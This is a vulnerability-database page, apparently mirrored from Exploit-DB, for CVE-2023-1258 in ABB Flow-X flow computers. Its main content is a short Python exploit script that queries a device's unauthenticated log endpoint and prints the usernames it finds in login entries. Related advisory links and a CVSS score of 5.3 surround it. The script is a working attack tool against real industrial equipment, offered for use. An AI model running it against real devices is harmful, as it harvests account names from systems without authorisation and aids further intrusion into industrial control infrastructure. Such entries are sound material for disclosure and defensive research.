Lucene search

K

ABB FlowX v4.00 - Exposure of Sensitive Information

🗓️ 19 Jul 2023 00:00:00Reported by Paul SmithType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 175 Views

ABB FlowX v4.00 Sensitive Information Exposur

Show more
Related
Code
ReporterTitlePublishedViews
Family
Cvelist
CVE-2023-1258 Flow-X disclosure of sensitive information to unauthenticated users
31 Mar 202307:56
cvelist
CVE
CVE-2023-1258
31 Mar 202308:15
cve
NVD
CVE-2023-1258
31 Mar 202308:15
nvd
0day.today
ABB FlowX v4.00 - Exposure of Sensitive Information Exploit
19 Jul 202300:00
zdt
Packet Storm
ABB FlowX 4.00 Information Disclosure
20 Jul 202300:00
packetstorm
Prion
Code injection
31 Mar 202308:15
prion
# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258


#!/usr/bin/python
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml
import requests

# Set the request parameter
url = sys.argv[1]


def dump_users():
    response = requests.get(url)

    # Check for HTTP codes other than 200
    if response.status_code != 200:
    	print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)
    	exit()

    # Decode the xml response into dictionary and use the data
    data = response.text
    soup = BS(data, features="xml")
    logs = soup.find_all("log")
    for log in logs:
    	test = re.search('User (.*?) logged in',str(log))
    	if test:
    		print(test.group(0))
def main():
	dump_users()


if __name__ == '__main__':
  	main()

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
19 Jul 2023 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS35.3
EPSS0.007
175
.json
Report